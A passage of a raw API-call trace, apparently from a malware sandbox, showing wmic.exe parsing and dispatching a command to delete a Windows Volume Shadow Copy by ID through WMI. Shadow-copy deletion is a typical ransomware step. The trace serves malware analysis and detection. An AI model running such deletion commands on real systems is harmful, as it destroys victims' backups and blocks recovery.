\"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete" [0095.092] malloc (_Size=0xe0) returned 0x4ccd30 [0095.092] memcpy_s (in: _Destination=0x4ccd30, _DestinationSize=0xde, _Source=0x1f25be, _SourceSize=0xd0 | out: _Destination=0x4ccd30) returned 0x0 [0095.093] malloc (_Size=0x18) returned 0x4cca60 [0095.093] malloc (_Size=0x18) returned 0x4cca80 [0095.093] malloc (_Size=0x18) returned 0x4ccaa0 [0095.093] malloc (_Size=0x18) returned 0x4ccac0 [0095.093] malloc (_Size=0x80) returned 0x4c6e90 [0095.093] GetLocalTime (in: lpSystemTime=0x18fb50 | out: lpSystemTime=0x18fb50*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x36, wSecond=0x3b, wMilliseconds=0x292)) [0095.093] _vsnwprintf (in: _Buffer=0x4c6e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x18faa8 | out: _Buffer="09-04-2020T08:54:59") returned 19 [0095.093] lstrlenW (lpString=" shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete") returned 71 [0095.093] malloc (_Size=0x90) returned 0x4c70a0 [0095.093] lstrlenW (lpString=" shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete") returned 71 [0095.093] lstrlenW (lpString=" shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete") returned 71 [0095.093] malloc (_Size=0x90) returned 0x4cce20 [0095.093] lstrlenW (lpString=" shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete") returned 71 [0095.093] lstrlenW (lpString=" shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete") returned 71 [0095.093] lstrlenW (lpString=" shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete") returned 71 [0095.093] malloc (_Size=0x16) returned 0x4ccae0 [0095.093] lstrlenW (lpString="shadowcopy") returned 10 [0095.093] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0095.093] malloc (_Size=0x16) returned 0x4ccb00 [0095.093] malloc (_Size=0x8) returned 0x4c7140 [0095.093] free (_Block=0x0) [0095.093] free (_Block=0x4ccae0) [0095.093] lstrlenW (lpString=" shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete") returned 71 [0095.093] malloc (_Size=0xc) returned 0x4ccae0 [0095.093] lstrlenW (lpString="where") returned 5 [0095.093] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0095.093] malloc (_Size=0xc) returned 0x4ccb20 [0095.093] malloc (_Size=0x10) returned 0x4ccb40 [0095.093] memmove_s (in: _Destination=0x4ccb40, _DestinationSize=0x8, _Source=0x4c7140, _SourceSize=0x8 | out: _Destination=0x4ccb40) returned 0x0 [0095.093] free (_Block=0x4c7140) [0095.093] free (_Block=0x0) [0095.094] free (_Block=0x4ccae0) [0095.094] lstrlenW (lpString=" shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete") returned 71 [0095.094] malloc (_Size=0x5c) returned 0x4ccec0 [0095.094] lstrlenW (lpString="\"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\"") returned 45 [0095.094] _wcsicmp (_String1="\"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\"", _String2="\"NULL\"") returned -5 [0095.094] lstrlenW (lpString="\"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\"") returned 45 [0095.094] lstrlenW (lpString="\"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\"") returned 45 [0095.094] malloc (_Size=0x5c) returned 0x4ccf30 [0095.094] malloc (_Size=0x18) returned 0x4ccae0 [0095.094] memmove_s (in: _Destination=0x4ccae0, _DestinationSize=0x10, _Source=0x4ccb40, _SourceSize=0x10 | out: _Destination=0x4ccae0) returned 0x0 [0095.094] free (_Block=0x4ccb40) [0095.094] free (_Block=0x0) [0095.094] free (_Block=0x4ccec0) [0095.094] lstrlenW (lpString=" shadowcopy where \"ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'\" delete") returned 71 [0095.094] malloc (_Size=0xe) returned 0x4ccb40 [0095.094] lstrlenW (lpString="delete") returned 6 [0095.094] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0095.094] malloc (_Size=0xe) returned 0x4ccb60 [0095.094] malloc (_Size=0x20) returned 0x4ccec0 [0095.094] memmove_s (in: _Destination=0x4ccec0, _DestinationSize=0x18, _Source=0x4ccae0, _SourceSize=0x18 | out: _Destination=0x4ccec0) returned 0x0 [0095.094] free (_Block=0x4ccae0) [0095.094] free (_Block=0x0) [0095.094] free (_Block=0x4ccb40) [0095.094] malloc (_Size=0x20) returned 0x4ccef0 [0095.094] lstrlenW (lpString="QUIT") returned 4 [0095.094] lstrlenW (lpString="shadowcopy") returned 10 [0095.094] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0095.094] lstrlenW (lpString="EXIT") returned 4 [0095.094] lstrlenW (lpString="shadowcopy") returned 10 [0095.094] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0095.094] free (_Block=0x4ccef0) [0095.094] WbemLocator:IUnknown:AddRef (This=0x1f71390) returned 0x2 [0095.094] malloc (_Size=0x20) returned 0x4ccef0 [0095.094] lstrlenW (lpString="/") returned 1 [0095.094] lstrlenW (lpString="shadowcopy") returned 10 [0095.094] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0095.095] lstrlenW (lpString="-") returned 1 [0095.095] lstrlenW (lpString="shadowcopy") returned 10 [0095.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0095.095] lstrlenW (lpString="CLASS") returned 5 [0095.095] lstrlenW (lpString="shadowcopy") returned 10 [0095.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0095.095] lstrlenW (lpString="PATH") returned 4 [0095.095] lstrlenW (lpString="shadowcopy") returned 10 [0095.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0095.095] lstrlenW (lpString="CONTEXT") returned 7 [0095.095] lstrlenW (lpString="shadowcopy") returned 10 [0095.095] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0095.095] lstrlenW (lpString="shadowcopy") returned 10 [0095.095] malloc (_Size=0x16) returned 0x4ccb40 [0095.095] lstrlenW (lpString="shadowcopy") returned 10 [0095.095] GetCurrentThreadId () returned 0x618 [0095.095] ??0CHString@@QEAA@XZ () returned 0x18f960 [0095.095] malloc (_Size=0x18) returned 0x4ccae0 [0095.095] malloc (_Size=0x18) returned 0x4ccb80 [0095.095] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f71390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff3f2998 | out: ppNamespace=0xff3f2998*=0x1f83a98) returned 0x0 [0095.123] free (_Block=0x4ccb80) [0095.123] free (_Block=0x4ccae0) [0095.123] CoSetProxyBlanket (pProxy=0x1f83a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0095.124] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0095.124] GetCurrentThreadId () returned 0x618 [0095.124] ??0CHString@@QEAA@XZ () returned 0x18f7f8 [0095.124] malloc (_Size=0x18) returned 0x4ccae0 [0095.124] malloc (_Size=0x18) returned 0x4ccb80 [0095.124] malloc (_Size=0x18) returned 0x4ccba0 [0095.124] malloc (_Size=0x18) returned 0x4ccbc0 [0095.124] SysStringLen (param_1="root\\cli") returned 0x8 [0095.124] SysStringLen (param_1="\\") returned 0x1 [0095.124] malloc (_Size=0x18) returned 0x4ccbe0 [0095.124] SysStringLen (param_1="root\\cli\\") returned 0x9 [0095.124] SysStringLen (param_1="ms_409") returned 0x6 [0095.124] free (_Block=0x4ccbc0) [0095.124] free (_Block=0x4ccba0) [0095.124] free (_Block=0x4ccb80) [0095.124] free (_Block=0x4ccae0) [0095.124] malloc (_Size=0x18) returned 0x4ccae0 [0095.124] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f71390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff3f29a0 | out: ppNamespace=0xff3f29a0*=0x1f83b28) returned 0x0 [0095.128] free (_Block=0x4ccae0) [0095.128] free (_Block=0x4ccbe0) [0095.128] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0095.128] GetCurrentThreadId () returned 0x618 [0095.128] ??0CHString@@QEAA@XZ () returned 0x18f970 [0095.128] malloc (_Size=0x18) returned 0x4ccbe0 [0095.128] malloc (_Size=0x18) returned 0x4ccae0 [0095.128] malloc (_Size=0x18) returned 0x4ccb80 [0095.128] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0095.129] malloc (_Size=0x3a) returned 0x4ccfa0 [0095.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff381980, cbMultiByte=-1, lpWideCharStr=0x4ccfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0095.129] free (_Block=0x4ccfa0) [0095.129] malloc (_Size=0x18) returned 0x4ccba0 [0095.129] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0095.129] SysStringLen (param_1="shadowcopy") returned 0xa [0095.129] malloc (_Size=0x18) returned 0x4ccbc0 [0095.129] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0095.129] SysStringLen (param_1="'") returned 0x1 [0095.129] free (_Block=0x4ccba0) [0095.129] free (_Block=0x4ccb80) [0095.129] free (_Block=0x4ccae0) [0095.129] free (_Block=0x4ccbe0) [0095.129] IWbemServices:GetObject (in: This=0x1f83a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x18f978*=0x0, ppCallResult=0x0 | out: ppObject=0x18f978*=0x1f904e0, ppCallResult=0x0) returned 0x0 [0095.134] malloc (_Size=0x18) returned 0x4ccbe0 [0095.134] IWbemClassObject:Get (in: This=0x1f904e0, wszName="Target", lFlags=0, pVal=0x18f8a0*(varType=0x0, wReserved1=0xff3f, wReserved2=0x0, wReserved3=0x0, varVal1=0xff3f2998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f8a0*(varType=0x8, wReserved1=0xff3f, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0095.134] free (_Block=0x4ccbe0) [0095.134] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0095.134] malloc (_Size=0x3e) returned 0x4ccfa0 [0095.134] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0095.135] malloc (_Size=0x18) returned 0x4ccbe0 [0095.135] IWbemClassObject:Get (in: This=0x1f904e0, wszName="PWhere", lFlags=0, pVal=0x18f8a0*(varType=0x0, wReserved1=0xff3f, wReserved2=0x0, wReserved3=0x0, varVal1=0x21e298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f8a0*(varType=0x8, wReserved1=0xff3f, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0095.135] free (_Block=0x4ccbe0) [0095.135] lstrlenW (lpString=" Where ID = '#'") returned 15 [0095.135] malloc (_Size=0x20) returned 0x4ccff0 [0095.135] lstrlenW (lpString=" Where ID = '#'") returned 15 [0095.135] malloc (_Size=0x18) returned 0x4ccbe0 [0095.135] IWbemClassObject:Get (in: This=0x1f904e0, wszName="Connection", lFlags=0, pVal=0x18f8a0*(varType=0x0, wReserved1=0xff3f, wReserved2=0x0, wReserved3=0x0, varVal1=0x26bd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f8a0*(varType=0xd, wReserved1=0xff3f, wReserved2=0x0, wReserved3=0x0, varVal1=0x1f909c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0095.135] free (_Block=0x4ccbe0) [0095.135] IUnknown:QueryInterface (in: This=0x1f909c0, riid=0xff387360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x18f890 | out: ppvObject=0x18f890*=0x1f909c0) returned 0x0 [0095.135] GetCurrentThreadId () returned 0x618 [0095.135] ??0CHString@@QEAA@XZ () returned 0x18f7b8 [0095.135] malloc (_Size=0x18) returned 0x4ccbe0 [0095.135] IWbemClassObject:Get (in: This=0x1f909c0, wszName="Namespace", lFlags=0, pVal=0x18f7e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff39738f, varVal2=0x4ccbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f7e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x4ccbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0095.135] free (_Block=0x4ccbe0) [0095.135] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0095.135] malloc (_Size=0x16) returned 0x4ccbe0 [0095.135] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0095.135] malloc (_Size=0x18) returned 0x4ccae0 [0095.136] IWbemClassObject:Get (in: This=0x1f909c0, wszName="Locale", lFlags=0, pVal=0x18f7e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29a648, varVal2=0x4ccbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f7e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x4ccbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0095.136] free (_Block=0x4ccae0) [0095.136] lstrlenW (lpString="ms_409") returned 6 [0095.136] malloc (_Size=0xe) returned 0x4ccae0 [0095.136] lstrlenW (lpString="ms_409") returned 6 [0095.136] malloc (_Size=0x18) returned 0x4ccb80 [0095.136] IWbemClassObject:Get (in: This=0x1f909c0, wszName="User", lFlags=0, pVal=0x18f7e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29a648, varVal2=0x4ccbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f7e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29a648, varVal2=0x4ccbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0095.136] free (_Block=0x4ccb80) [0095.136] malloc (_Size=0x18) returned 0x4ccb80 [0095.136] IWbemClassObject:Get (in: This=0x1f909c0, wszName="Password", lFlags=0, pVal=0x18f7e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29a648, varVal2=0x4ccbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f7e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29a648, varVal2=0x4ccbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0095.136] free (_Block=0x4ccb80) [0095.136] malloc (_Size=0x18) returned 0x4ccb80 [0095.136] IWbemClassObject:Get (in: This=0x1f909c0, wszName="Server", lFlags=0, pVal=0x18f7e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29a648, varVal2=0x4ccbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f7e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x4ccbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0095.136] free (_Block=0x4ccb80) [0095.136] lstrlenW (lpString=".") returned 1 [0095.136] malloc (_Size=0x4) returned 0x4c7140 [0095.136] lstrlenW (lpString=".") returned 1 [0095.136] malloc (_Size=0x18) returned 0x4ccb80 [0095.136] IWbemClassObject:Get (in: This=0x1f909c0, wszName="Authority", lFlags=0, pVal=0x18f7e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29a648, varVal2=0x4ccbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f7e0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29a648, varVal2=0x4ccbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0095.136] free (_Block=0x4ccb80) [0095.136] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0095.136] IUnknown:Release (This=0x1f909c0) returned 0x1 [0095.137] GetCurrentThreadId () returned 0x618 [0095.137] ??0CHString@@QEAA@XZ () returned 0x18f7b8 [0095.137] malloc (_Size=0x18) returned 0x4ccb80 [0095.137] IWbemClassObject:Get (in: This=0x1f904e0, wszName="__RELPATH", lFlags=0, pVal=0x18f7e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29a648, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x18f7e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0095.137] free (_Block=0x4ccb80) [0095.137] malloc (_Size=0x18) returned 0x4ccb80 [0095.137] GetCurrentThreadId () returned 0x618 [0095.137] ??0CHString@@QEAA@XZ () returned 0x18f638 [0095.137] ??0CHString@@QEAA@PEBG@Z () returned 0x18f650 [0095.137] ??0CHString@@QEAA@AEBV0@@Z () returned 0x18f5e0 [0095.137] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0095.137] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x4cd020 [0095.137] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0095.137] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x18f5a0 [0095.137] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x18f5e8 [0095.137] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x18f650 [0095.137] ??1CHString@@QEAA@XZ () returned 0x51d32a01 [0095.137] ??1CHString@@QEAA@XZ () returned 0x51d32a01 [0095.137] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x18f5a8 [0095.137] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x18f5e0 [0095.137] ??1CHString@@QEAA@XZ () returned 0x1 [0095.137] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x4cd090 [0095.137] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0095.137] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x18f5a0 [0095.137] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x18f5e8 [0095.137] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x18f650 [0095.137] ??1CHString@@QEAA@XZ () returned 0x51d32a01 [0095.137] ??1CHString@@QEAA@XZ () returned 0x51d32a01 [0095.137] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x18f5a8 [0095.137] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x18f5e0 [0095.138] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0095.138] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0095.138] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0095.138] malloc (_Size=0x18) returned 0x4ccba0 [0095.138] malloc (_Size=0x18) returned 0x4ccc00 [0095.138] malloc (_Size=0x18) returned 0x4ccc20 [0095.138] malloc (_Size=0x18) returned 0x4ccc40 [0095.138] malloc (_Size=0x18) returned 0x4ccc60 [0095.138] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0095.138] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0095.138] malloc (_Size=0x18) returned 0x4ccc80 [0095.138] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0095.138] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0095.138] malloc (_Size=0x18) returned 0x4ccca0 [0095.138] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0095.138] SysStringLen (param_1="\"") returned 0x1 [0095.138] free (_Block=0x4ccc80) [0095.138] free (_Block=0x4ccc60) [0095.138] free (_Block=0x4ccc40) [0095.138] free (_Block=0x4ccc20) [0095.138] free (_Block=0x4ccc00) [0095.139] free (_Block=0x4ccba0) [0095.139] IWbemServices:GetObject (in: This=0x1f83b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x18f628*=0x0, ppCallResult=0x0 | out: ppObject=0x18f628*=0x1f90a50, ppCallResult=0x0) returned 0x0 [0095.140] malloc (_Size=0x18) returned 0x4ccba0 [0095.140] IWbemClassObject:Get (in: This=0x1f90a50, wszName="Text", lFlags=0, pVal=0x18f660*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff3f2ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x18f660*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x294aa0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x21e030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0095.140] free (_Block=0x4ccba0) [0095.140] SafeArrayGetLBound (in: psa=0x294aa0, nDim=0x1, plLbound=0x18f640 | out: plLbound=0x18f640) returned 0x0 [0095.140] SafeArrayGetUBound (in: psa=0x294aa0, nDim=0x1, plUbound=0x18f630 | out: plUbound=0x18f630) returned 0x0 [0095.140] SafeArrayGetElement (in: psa=0x294aa0, rgIndices=0x18f624, pv=0x18f678 | out: pv=0x18f678) returned 0x0 [0095.140] malloc (_Size=0x18) returned 0x4ccba0 [0095.140] malloc (_Size=0x18) returned 0x4ccc00 [0095.140] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0095.140] free (_Block=0x4ccba0) [0095.140] IUnknown:Release (This=0x1f90a50) returned 0x0 [0095.140] free (_Block=0x4ccca0) [0095.140] ??1CHString@@QEAA@XZ () returned 0x51d32a01 [0095.141] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0095.141] free (_Block=0x4ccb80) [0095.141] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0095.141] lstrlenW (lpString="Shadow copy management.") returned 23 [0095.141] malloc (_Size=0x30) returned 0x4c85c0 [0095.141] lstrlenW (lpString="Shadow copy management.") returned 23 [0095.141] free (_Block=0x4ccc00) [0095.141] IUnknown:Release (This=0x1f904e0) returned 0x0 [0095.141] free (_Block=0x4ccbc0) [0095.141] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0095.141] lstrlenW (lpString="PATH") returned 4 [0095.141] lstrlenW (lpString="where") returned 5 [0095.141] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0095.141] lstrlenW (lpString="WHERE") returned 5 [0095.141] lstrlenW (lpString="where") returned 5 [0095.141] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0095.141] lstrlenW (lpString="/") returned 1 [0095.141] lstrlenW (lpString="ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'") returned 43 [0095.141] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0095.141] lstrlenW (lpString="-") returned 1 [0095.141] lstrlenW (lpString="ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'") returned 43 [0095.141] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0095.141] lstrlenW (lpString="ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'") returned 43 [0095.141] malloc (_Size=0x58) returned 0x4cd020 [0095.141] lstrlenW (lpString="ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'") returned 43 [0095.141] lstrlenW (lpString="/") returned 1 [0095.141] lstrlenW (lpString="delete") returned 6 [0095.141] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0095.141] lstrlenW (lpString="-") returned 1 [0095.141] lstrlenW (lpString="delete") returned 6 [0095.141] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0095.141] lstrlenW (lpString="delete") returned 6 [0095.141] malloc (_Size=0xe) returned 0x4ccbc0 [0095.142] lstrlenW (lpString="delete") returned 6 [0095.142] lstrlenW (lpString="GET") returned 3 [0095.142] lstrlenW (lpString="delete") returned 6 [0095.142] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0095.142] lstrlenW (lpString="LIST") returned 4 [0095.142] lstrlenW (lpString="delete") returned 6 [0095.142] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0095.142] lstrlenW (lpString="SET") returned 3 [0095.142] lstrlenW (lpString="delete") returned 6 [0095.142] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0095.142] lstrlenW (lpString="CREATE") returned 6 [0095.142] lstrlenW (lpString="delete") returned 6 [0095.142] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0095.142] lstrlenW (lpString="CALL") returned 4 [0095.142] lstrlenW (lpString="delete") returned 6 [0095.142] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0095.142] lstrlenW (lpString="ASSOC") returned 5 [0095.142] lstrlenW (lpString="delete") returned 6 [0095.142] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0095.142] lstrlenW (lpString="DELETE") returned 6 [0095.142] lstrlenW (lpString="delete") returned 6 [0095.142] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0095.142] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0095.142] malloc (_Size=0x3e) returned 0x4cd080 [0095.142] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0095.142] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0095.142] malloc (_Size=0x18) returned 0x4ccc00 [0095.142] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0095.143] lstrlenW (lpString="FROM") returned 4 [0095.143] lstrlenW (lpString="*") returned 1 [0095.143] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0095.143] malloc (_Size=0x18) returned 0x4ccb80 [0095.143] free (_Block=0x4ccc00) [0095.143] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0095.143] lstrlenW (lpString="FROM") returned 4 [0095.143] lstrlenW (lpString="from") returned 4 [0095.143] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0095.143] malloc (_Size=0x18) returned 0x4ccc00 [0095.143] free (_Block=0x4ccb80) [0095.143] wcstok (in: _String=0x0, 